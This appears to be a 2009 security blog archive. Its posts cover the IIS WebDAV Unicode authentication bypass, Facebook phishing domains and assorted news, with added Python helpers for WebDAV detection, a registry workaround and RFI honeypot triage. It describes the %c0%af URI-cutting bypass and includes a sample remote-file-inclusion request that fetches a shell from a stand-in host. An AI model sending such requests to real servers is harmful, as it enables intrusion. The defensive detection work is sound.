• webdav hacking campaign, find vulnerable server before hackers do

    IIS 6 sites with the WebDAV extension enabled may be vulnerable to authentication bypass because of a bug in the way that the extension handles Unicode characters.

    Cutting the URI path with random Unicode characters allows hackers to bypass the access control list. Depending on the permissions of the Web server files, a hacker would be able to retrieve user names and passwords, upload, overwrite and delete files, or run malicious code.

    Use the WebTuff utility to check whether your system is vulnerable. It does the following:

    1.  Try to retrieve the file at the given URI using a simple WebDAV GET command

    2.  Try to retrieve the file at the given URI using a simple WebDAV GET command, cutting the URI with these Hex | Unicode characters: %c0 and %af.

    3.  Save the retrieved file locally and / or report server response

    Download WebTuff Tool:

    webTuff link (zip file containing win32 binary + Python source code)

    WebTuff-MD5 (MD5 hash of WebTuff binary)


    http://www.applicure.com/News/WebDAV_Exploit

  • Apple has to put some security in its 5 month old java bug

    If you don't agree you can protest at Apple http://www.apple.com/feedback/macosx.html and ask them why they are taking so long to fix a bug that Sun already fixed in DECEMBER.

    Secondly, your Mac can be hacked by any specially crafted package on a website, even if you have patched and secured your machine.

    You can only stop this meanwhile by

    * disabling the downloading of 'safe' files

    * dumping the Safari crap and taking a real browser

    * disabling Java in Safari if you still want to use that crap

    If you are not running a Mac, you should however fix this bug here:

    http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1

    Let's hope that the Java and Mac update processes become more professional.
    Macromedia has already decided to re-organise its update process, although a 3-month period is much too long. It looks like the Oracle patch process.

  • belnet, the Belgian official internetworks mostly attacked by chinese networks

    2. Top scanners from their newsletter

    #    | Region / Domain
    4345 | Zigong Sciences Informations Academe
    933  | Flexwebhosting B.V
    886  | CHINANET anhui province network
    850  | China Unicom Heilongjiang Province Network
    591  | Ministry of Water and Irrigation
    556  | China Unicom Beijing province network
    556  | Sichuan Public Information Industry Co.Ltd IDC
    501  | CHINANET Anhui province network
    452  | CHINANET-HN Zhuzhou node network
    434  | CHINANET jiangsu province network

    3. Top scanned ports

    #    | port #     | service
    5849 | 1434 / udp | Microsoft SQL Monitor
    3950 | 445 / tcp  | Windows File-&Print Sharing - SMB
    1788 | 22 / tcp   | ssh
    1534 | 1433 / tcp |
    1219 | 2967 / tcp |
    872  | 23 / tcp   |
    845  | 135 / tcp  | DCE Endpoint
    750  | 139 / tcp  |
    611  | 1026 / udp |
    604  | 4899 / tcp |

    https://cert.belnet.be/newsletters/belnet-cert-newsletter-new2009-21

    Do we really need that Chinese traffic, or should we whitelist it instead of blacklisting it?

  • behind the facebook campaign of Verhofstadt

    Another non-story hitting the presses during this boring campaign, which has all the ingredients to be hard-hitting but where the audiovisual media are doing everything to kill any debate or explanation that is longer than 20 seconds. I love the US debates, about which so many people thought that they were empty marketing, but which are very interesting compared to what the journalists are asking here and the opportunity the politicians get to tell their story. (Sometimes I think that it is not because the journalist has heard the same arguments and stories and facts a thousand times before that he or she should censor them away from readers and viewers who didn't have access to or interest in that information before the elections.)

    So he is on Facebook, Verhofstadt, and that makes the international news?

    http://www.facebook.com/pages/Guy-Verhofstadt/99985820015

    He has 2000 friends as a member of a party with thousands more members and sympathisers (who are mailing or spamming like crazy to get his number of friends as high as possible) and as the leading prominent candidate for the European elections (asking for the vote of millions of voters). And he has only 2000 friends? I hope he has more votes .....

    Even more remarkable: the news should not be that he has 2000 virtual friends, no, the news should be that he has ONLY a bit more than 2000 friends and that all the Facebook hype is more hype than having any impact on this election this time around.

  • all Openssh not 5.2 is insecure an sich

    All programs that incorporate the OpenSSH implementation of SSH, short for Secure Shell, should make sure they use version 5.2, which provides several countermeasures to prevent the attacks. Other SSH implementations may be vulnerable as well, the researchers from the Information Security Group at the University of London's Royal Holloway said.

    The attack exploits subtle differences in the way SSH software reacts when encountering errors during cryptographic processing. By directing specially manipulated packets at the application, an attacker has a one in 262,144 chance of recovering 32 bits of plaintext from an arbitrary chunk of ciphertext.


    http://www.securityfocus.com/news/11550

  • nuclear energy of the 4th generation in trouble

    The massive power plant under construction on muddy terrain on this Finnish island was supposed to be the showpiece of a nuclear renaissance. The most powerful reactor ever built, its modular design was supposed to make it faster and cheaper to build. And it was supposed to be safer, too.

    But things have not gone as planned.

    After four years of construction and thousands of defects and deficiencies, the reactor’s 3 billion euro price tag, about $4.2 billion, has climbed at least 50 percent. And while the reactor was originally meant to be completed this summer, Areva, the French company building it, and the utility that ordered it, are no longer willing to make certain predictions on when it will go online.


    http://www.nytimes.com/2009/05/29/business/energy-environment/29nuke.html?hpw

  • webdav hacking still in full force, how to find webdav servers on your networks

    Question: How can I find IIS servers in my environment running WebDAV?

    Answer: You can use the IIS Manager interface on the server to quickly tell whether the server is running WebDAV. If you want to do so remotely, you can issue an HTTP request to the server directly:

    $ telnet server 80

    OPTIONS / HTTP/1.1
    Host: server
    Accept: */*

    (An extra Enter on the blank line after the Accept will complete the request for the webserver.)

    If you get an HTTP response that looks like the one below, the server is running WebDAV.

    HTTP/1.1 200 OK
    Date: Wed, 20 May 2009 00:52:58 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    MS-Author-Via: DAV
    Content-Length: 0
    Accept-Ranges: none
    DASL:
    DAV: 1, 2
    Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
    Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
    Cache-Control: private

    To evaluate the response for existence of WebDAV, use the following logic:

    • Received a 2xx response status to the OPTIONS request made to the root of the site.
    • Response contains a DAV header with value 1,2.
    • Response contains an MS-Author-Via header which contains the DAV value.
    • Response DOES NOT contain an X-MSDAVEXT header. Existence of this header means it is SharePoint's DAV.

    To test a server that only accepts HTTPS connections, you can use a tool like wfetch.
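    The four-rule check above, as an added example in Python that is not from the Microsoft SRD post: classify() parses a raw OPTIONS response and returns the verdict, and probe() sends the same request as the telnet session (plain HTTP only). The sample response is the one shown above, re-typed as a constructed string with the wrapped PROPFIND line re-joined.

```python
import re
import socket

# Constructed copy of the OPTIONS response shown in the post (PROPFIND line re-joined).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 20 May 2009 00:52:58 GMT\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "MS-Author-Via: DAV\r\n"
    "Content-Length: 0\r\n"
    "Accept-Ranges: none\r\n"
    "DASL: \r\n"
    "DAV: 1, 2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "Cache-Control: private\r\n"
    "\r\n"
)


def parse_response(raw):
    """Return (status_code, headers) with header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    match = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    if not match:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return int(match.group(1)), headers


def _tokens(value):
    """Split a comma-separated header value into a set of lower-cased tokens."""
    return {part.strip().lower() for part in value.split(",") if part.strip()}


def classify(raw):
    """Apply the four rules: 'iis-webdav', 'sharepoint-dav', 'no-webdav' or 'not-2xx'."""
    status, headers = parse_response(raw)
    if not 200 <= status < 300:                                          # rule 1
        return "not-2xx"
    has_dav_12 = {"1", "2"} <= _tokens(headers.get("dav", ""))           # rule 2
    has_author_via = "dav" in _tokens(headers.get("ms-author-via", ""))  # rule 3
    if not (has_dav_12 and has_author_via):
        return "no-webdav"
    if "x-msdavext" in headers:                 # rule 4: SharePoint's DAV, not IIS's
        return "sharepoint-dav"
    return "iis-webdav"


def probe(host, port=80, timeout=5.0):
    """Send the OPTIONS request from the telnet session and classify the reply.

    Plain HTTP only; for HTTPS-only servers use a tool such as wfetch, as the post says.
    """
    request = ("OPTIONS / HTTP/1.1\r\nHost: %s\r\nAccept: */*\r\n"
               "Connection: close\r\n\r\n" % host)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return classify(b"".join(chunks).decode("iso-8859-1"))
```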


    http://blogs.technet.com/srd

  • attacks on Directshow quicktime filter

    As every application tries to build as many of its own plugins as possible for all the old, new and marginal protocols and products in use, vulnerabilities will continue to pop up in client software.

    Today it is Microsoft's DirectShow that is being hit by exploits for its QuickTime plugin. It is not even necessary to have QuickTime installed or to open QuickTime files. If you have quartz.dll, then you are vulnerable, period.

    The best workaround is this one, according to Microsoft:

    #1: Disable QuickTime parsing in Quartz.dll by deleting the following registry key:

    HKEY_CLASSES_ROOT\CLSID\{D51BD5A0-7548-11CF-A520-0080C77EF58A}

    This is fine for a lot of networks where this operation will be set into motion.
    But how do individual newbies do that without making some mistake?
    Shouldn't you produce some script or program to do that for them?
    Click and play?

    You can try it this way.

    For 32-bit Windows systems:

    1. Click Start, click Run, type Regedit in the Open box, and then click OK.

    2. Locate the following subkey:
       HKEY_CLASSES_ROOT\CLSID\{D51BD5A0-7548-11CF-A520-0080C77EF58A}

    3. On the File menu, click Export.

    4. In the Export Registry File dialog box, enter QuickTime_Parser_Backup.reg and click Save.
       Note: This will create a backup of this registry key in the My Documents folder by default.

    5. Press the Delete key on the keyboard to delete the registry key. When prompted to delete the registry key via the Confirm Key Delete dialog box, click Yes.
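    A scripted version of the five steps above, as an added example (not Microsoft's or ISC's code) in Python using the standard-library winreg module: it exports the key to QuickTime_Parser_Backup.reg first and only deletes it once the backup exists. It assumes 32-bit Windows as in the steps and Python run from an elevated prompt; on other platforms only the path helpers do anything.

```python
import os
import subprocess
try:
    import winreg                      # present only in Windows builds of Python
except ImportError:
    winreg = None

CLSID = "{D51BD5A0-7548-11CF-A520-0080C77EF58A}"   # QuickTime parser CLSID from the advisory
SUBKEY = "CLSID\\" + CLSID
REG_PATH = "HKEY_CLASSES_ROOT\\" + SUBKEY            # full path in the form reg.exe expects
BACKUP_NAME = "QuickTime_Parser_Backup.reg"          # file name used in step 4


def backup_path(documents_dir=None):
    """Default to the My Documents folder, like Regedit's Export dialog in step 4."""
    if documents_dir is None:
        documents_dir = os.path.join(os.path.expanduser("~"), "Documents")
    return os.path.join(documents_dir, BACKUP_NAME)


def key_present():
    """Step 2: does the QuickTime parser key exist? False where winreg is unavailable."""
    if winreg is None:
        return False
    try:
        winreg.CloseKey(winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, SUBKEY))
        return True
    except OSError:
        return False


def export_key(backup_file):
    """Steps 3-4: export with reg.exe so the key can be restored by importing the file."""
    if os.path.exists(backup_file):
        raise FileExistsError("refusing to overwrite earlier backup: " + backup_file)
    subprocess.run(["reg.exe", "export", REG_PATH, backup_file], check=True)


def delete_key_tree(root, subkey):
    """Step 5: winreg.DeleteKey refuses keys that have children, so delete depth-first."""
    children = []
    with winreg.OpenKey(root, subkey) as key:
        index = 0
        while True:
            try:
                children.append(winreg.EnumKey(key, index))
                index += 1
            except OSError:            # no more subkeys
                break
    for child in children:
        delete_key_tree(root, subkey + "\\" + child)
    winreg.DeleteKey(root, subkey)


def disable_quicktime_parsing(documents_dir=None):
    """Return the backup path on success, or None if the key was already absent."""
    if not key_present():
        return None
    backup_file = backup_path(documents_dir)
    export_key(backup_file)            # never delete without a backup
    delete_key_tree(winreg.HKEY_CLASSES_ROOT, SUBKEY)
    if key_present():
        raise RuntimeError("key still present after deletion")
    return backup_file


if __name__ == "__main__":
    result = disable_quicktime_parsing()
    print("already absent" if result is None else "deleted; backup at " + result)
```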


    Sources: Microsoft and ISC.
    This vulnerability is being exploited right now in different forms.

  • war comes unexpectedly

    Everybody expected war in Iraq and Afghanistan and Pakistan and everybody was focusing on these wars and how to contain them.

    Meanwhile the situation in Korea is getting out of hand at an incredibly fast pace. Never have there been so many war-preparing acts and provocations in so few hours. The preparation for the Iraqi war took months and could be halted any minute during all that time - in theory.

    I have the impression that something is going incredibly wrong there and that there should be more attention for this situation. An American general declared that the US could go to war and North Korea has suspended the truce. Yesterday they were testing rockets again. If that isn't the most dangerous situation on earth at the moment, then I don't know what is.

    For firms with links to China these can become very difficult times, as nobody is sure what could happen when the first incidents at the North Korean border (the most militarized in the world) happen. I suppose DRP teams are getting their plans out of the box and are doing the necessary paperwork and taking the necessary decisions so that everything is in place if.....

    The advantage of this is that even if nothing happens on the war front, you are prepared when the swine flu eventually hits some regions of China big time. (You don't need a great number of infections to have huge economic effects, as Mexico has shown.)

    For the financial risk assessment manager: China is the economic production pool of the world. If it becomes involved in military actions or has sanctions imposed on it because it helps North Korea survive economic sanctions, the economic effects could be huge.

    The more I look at it, the more I think: what a mess. I hope somebody in North Korea gets back his cool before the train of war has left the station and there is nothing to stop it.

    Frank De Winne may in that case view the first local nuclear war on earth from the safe space station :) But that is cynical me, just joking.

  • flu : first Belgian school closed in Belgium

    They decided to close a whole school in Tervuren until next week (The International School) because a father and his kid who came back from the US seem to be infected. As there are only 25 places in the Brussels hospital for isolated treatment of this disease, they were all asked to stay home, not have any visits and take their medicines. Probably it will all stay under control, but you can see how fast it can go. You only need one worker back from the US or another country with some infections to have to close down your school or infrastructure for a week. (Any DRP, any homeworking possibilities?)

    Normally there should be a vaccine for the present virus available in August or September, but after that it will have to be produced and distributed in time. And we should hope that meanwhile it doesn't mutate and transform itself by mixing with the new viral flu virus or the bird flu or any other kind of flu or virus that we thought to be harmless until now.

    We have already published the documents and checklists about preparing your institution or enterprise for Belgium, and some other US reports are available at our ebooks blog.

    Don't look on influenza.be, there is no news yet about the new cases, which is a pity because this way you leave the communication solely to the media and you can only hope that everybody believes them and that the journalist stays calm and is intelligent enough to report the facts and nothing but the facts.

    With 285 kids and their families, and a case that was only discovered yesterday although the persons had been back in Belgium since Sunday, you can multiply the number of people that may have been in contact, or think they may have been, and may now have questions or want to have a medical check or just some medicines just to be sure. There is nothing reassuring about the website as it is today in such a case. They clearly didn't foresee that in their crisis communication, if you can call it crisis communication, because this is the first possible small crisis and there is no official communication.

  • another case of stolen stupid emails that have legal implications

    There is a huge controversy about the plans to build a whole network of routes and bridges and tunnels in and around Antwerp. In total there are about 3 to 4 alternatives and after 13 years of study the Flemish government and the City of Antwerp (half a million citizens, one of the biggest ports of Europe) want a final decision to be taken this year or next year at the latest.

    As usual there are some effective and professional action groups, and over the last year the political parties have started to differ about which alternative to choose. In the meantime there are regional elections for the Flemish parliament (and indirectly government).

    To make it easier for the next government to take a decision, the newly formed organisation which is responsible for the management of this project (BAM) has asked the city of Antwerp for a construction permit. It could only do this if it also received a Local Environmental Effect report that gave the 'green light' for the proposed construction. In this case this report also had to show why the proposed construction was better than the alternatives that the community organisations proposed. Normally that should have been done by an independent auditor, whatever that means around here.

    They finally had such a report and received the permit for the construction of their favourite proposal (and not for the other alternatives). This report was in contradiction with the other international specialised audits which investigated the three biggest alternatives and preferred one proposed by the community groups.

    Now a local Flemish newsweekly says it has emails between the 'independent' auditor for the Regional Environmental report and the director of the BAM that clearly show that the argumentation for their choice of the first proposal of the BAM was written and guided by the BAM. This means that the Local Environmental Report was not made independently and can be thrown in the wastebasket. It also means that the construction permit is invalid, as there is no independent Local Environmental Report attached to it. This means that the whole work can be done over again.

    Luckily for the community groups, these people were so stupid as to put those things in email and keep their emails, and there was somebody that leaked them.

  • belgian sentenced to 1 year of prison for emailstalking of his local administration

    It would be funny if it weren't true. But hey, this is the country of Magritte and Ensor.

    A judge decided today that he would side with the commune of Blankenberge and convicted its assailant to 1 year of prison for stalking its administration with 130 mails over 3 years. (That is really a flood - so if you want to submerge a local administration around here you only have to send more than 100 mails over 3 years.)

    Normally an administration can't use the law on stalking because the law is made for individuals, not for administrations or organisations. It was also the administration as a whole that sued the assailant and not one individual civil servant or elected official.

    So if this is upheld in a higher court, then any action group or individual that is using email as an instrument to lobby for or against something - or any persistent disgruntled citizen - can be sued and eventually sentenced to one year effective in jail in Belgium.

    The guy is also prosecuted for abuse of the infrastructure of the local administration by sending so many mails. This is a joke, right? Because with this we could not only sue any commercial emailer or spammer but also any mailserver that has been hacked and is sending out emails in the thousands to infect or spam us.

    Even if the person in question was insulting and launching all kinds of threats and insinuations, then he should have been prosecuted for this, whatever the communicative means he was using to do it. If this had been the case, the argument would have been about his insinuations and threats, not about the use of email to send them. The danger of this jurisprudence is that email will now be put in a very strict legal environment that makes sending community-action based emails out from Belgium a very dangerous act indeed.

    If you use email as public pressure you will have to search for mailservers outside the European Union that are not part of the Google-Microsoft-Yahoo infrastructure. The fact is that the US has the best defence of freedom of speech - something we don't know around here.

    So after blogging, now it is email, and what will be next that will have to migrate to the States one day to protect the possibilities of freedom of speech?

    By the way, couldn't they just have put an antispam filter on his mails with an autoresponder saying that these kinds of complaints and insinuations can't be handled in the form of an informal email and had to be sent as an official letter?

  • how many twitter related applications will go down this week

    http://www.twitpocalypse.com/  a joke or for real? Hyped up by Twitter, bringing Twitter even faster to its knees.


  • webdav hacking campaign going on in full force

    Since the WebDAV vulnerability came out, about 800 Danish websites were hacked by Islamic hackers.

    See this http://www.zone-h.org/archive/filter=1/domain=dk/page=35

    and around 250 .nl sites http://www.zone-h.org/archive/filter=1/domain=nl/page=10

    These links will show nothing interesting in a few hours because the database is renewed. But the level of new hacks has not been so high for months.

    IP or country filtering does not work as a defense against this.

    You should also totally secure your installation. Only upgrading to IIS 7 and Windows 2008 is not enough if you don't implement all the rules that Microsoft has set out.


  • help this anti RFI honeypot with a simple code on your site

    As part of the work at our lab we started to work on methods to learn more about remote file inclusion (RFI) attacks. The Internet Storm Center has developed a web-based honeypot which is available in a beta version. This honeypot can be used to collect information about different kinds of attacks, but requires the participant to install and maintain a honeypot on his own. For example, it is possible to deploy this honeypot on an OpenWrt router.
    Since we are aiming only at RFI attacks, an easier approach is to redirect incoming malicious requests to a central honeypot which then aggregates the information. Jan already blogged about this idea; this posting is meant to spread the word.

    You can help us by using the following .htaccess file on your web server:

    Options +FollowSymlinks
    RewriteEngine on
    RewriteCond %{QUERY_STRING} (.+=http://.+)
    RewriteRule ^(.+)$ http://link.informatik.uni-mannheim.de/$1?%1 [R,NC]

    The script checks if the incoming request looks like an RFI attack (RewriteCond) and then redirects this request to one of our honeypots (RewriteRule). Please let us know if you have any questions or ideas.
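    The RewriteCond test above, as an added example in Python that is not the Mannheim lab's code: it applies the same `(.+=http://.+)` pattern to a few constructed request lines and builds the URL the RewriteRule would redirect to. It also shows two properties of the rule worth knowing before deploying it: a benign parameter such as next=http://... is redirected as well, and the match is case-sensitive, because the [NC] flag is on the RewriteRule, not on the RewriteCond.

```python
import re
from urllib.parse import urlsplit

# Same pattern as the RewriteCond; no IGNORECASE because [NC] only applies to the RewriteRule.
RFI_PATTERN = re.compile(r"(.+=http://.+)")
HONEYPOT = "http://link.informatik.uni-mannheim.de"    # target from the RewriteRule

# Constructed sample request lines, not real traffic. The first is an RFI attempt,
# the third a benign redirect parameter that the pattern matches as well.
SAMPLE_REQUESTS = [
    "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",
    "GET /login.php?next=http://www.example.com/home HTTP/1.1",
    "GET /static/logo.png HTTP/1.1",
]


def rewrite_target(request_line):
    """Return the honeypot URL the .htaccess would redirect to, or None if no match.

    Mirrors: RewriteRule ^(.+)$ http://link.informatik.uni-mannheim.de/$1?%1 [R,NC]
    In a per-directory (.htaccess) context $1 is the path without its leading slash,
    and %1 is the RewriteCond back-reference, i.e. the whole matched query string.
    """
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)               # splits at the first '?', keeps later '?' in query
    match = RFI_PATTERN.search(parts.query)
    if not match:
        return None
    path = parts.path.lstrip("/")
    return "%s/%s?%s" % (HONEYPOT, path, match.group(1))


def triage(request_lines):
    """Pair each request line with its redirect target (None = served normally)."""
    return [(line, rewrite_target(line)) for line in request_lines]


if __name__ == "__main__":
    for line, target in triage(SAMPLE_REQUESTS):
        print("%-60s -> %s" % (line, target or "(not redirected)"))
```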

  • vista and windows 2008 SP2 downloads available and coming

    SP2 for Vista and Windows Server 2008 is available for download from the Download Center (x86, ISO and 64-bit flavors).

    Microsoft is expected to begin pushing SP2 to users via Windows Update on June 30, according to the aforementioned company official.

    Microsoft released SP2 to manufacturing on April 30 and has been telling customers it would deliver the final SP2 bits to the public before the end of the second quarter of 2009.


    http://blogs.zdnet.com/microsoft/?p=2871&tag=nl.e019

  • IIS servers 5 and 6 under attack are you at risk ?

    You are not at risk if : (Source : Microsoft SRD Team)

    • "An IIS server not running WebDAV is safe.
      The Windows Server 2003 IIS (version 6) shipped with WebDAV disabled by default.
    • An IIS server not using IIS permissions to restrict content to authenticated users is safe.
    • An IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
    • An IIS server that hosts web applications using only forms-based authentication is probably safe.

    You are at risk : (Source Microsoft SRD Team, except italics by myself)

    • IF an IIS 5, 5.1, or 6.0 webserver is running with WebDAV enabled (default for IIS5);
    • AND the IIS server is using IIS permissions to restrict a subfolder of content to authenticated users;
    • AND file system access is granted for the restricted content to the IUSR_[MachineName] account;
    • AND a parent folder of the private subfolder allows anonymous access;
      THEN an anonymous remote user may be able to leverage this vulnerability to access files that normally would only be served to authenticated webserver users."

    These attacks are continuing on an intensive scale..... it is only a matter of time before they arrive at your site if you didn't fix it.

    Go to IIS 7 and leave off the things that are disabled by default if you haven't learned in every detail what you should and shouldn't do.

  • You can not delete your pictures from these sites

    This can change in the coming hours or days, but after an experiment lasting 30 days the following sites make it impossible to delete your pictures. If you have sent the links, there will always be a way to find your picture in cached ONLINE content. We re-ordered it.

    Site                | Type              | CDN Operator    | Revocation
    Bebo                | Social Networking | Bebo            | Unrevoked
    Facebook            | Social Networking | Akamai          | Unrevoked
    hi5                 | Social Networking | Akamai          | Unrevoked
    MySpace             | Social Networking | Akamai          | Unrevoked
    SkyRock             | Blogging          | Téléfun         | Unrevoked
    Flickr              | Photo Sharing     | Yahoo           | Immediate
    LiveJournal         | Blogging          | LiveJournal     | Immediate*
    Orkut               | Social Networking | Google          | Immediate
    Photobucket         | Photo Sharing     | Photobucket     | Immediate
    Windows Live Spaces | Social Networking | Microsoft       | N/A (cookies)
    Fotki               | Photo Sharing     | Fotki           | < 1 hour
    Picasa              | Photo Sharing     | Google          | 5 hours
    Xanga               | Blogging          | Xanga           | 6 hours*
    Blogger             | Blogging          | Google          | 36 hours
    Friendster          | Social Networking | Panther Express | 6 days
    Tagged              | Social Networking | Limelight       | 14 days

    http://www.lightbluetouchpaper.org/2009/05/20/attack-of-the-zombie-photos

  • what happens after the .be facebook phishing

    "The form sends your stolen credentials back to bestspace.be for processing:

    <form method="POST" action="/?login_attempt=1">

    Digging a little deeper we find this site is hosted on  211.95.78.98 which hosts a few other malicious domains as well:

    degunter.cn
    daratop.cn

    Doing a quick search for daratop.cn yields more hostile activity in the form of malware. Honeynet.cz has more information and so does the Malware Domains List.

    The registrant of daratop.cn is steven_lucas_2000@yahoo.com, a couple of searches for this email reveals many different attacks that this individual has been involved in.

    Example 1
    Example 2

    In closing, all of these sites are hostile and should be blocked and avoided."

    source

  • new .be facebook phishing site discovered

    databus.be

    who has registered it


    only the email address is different

    and where is it hosted - even if no dns information is found(robtex)
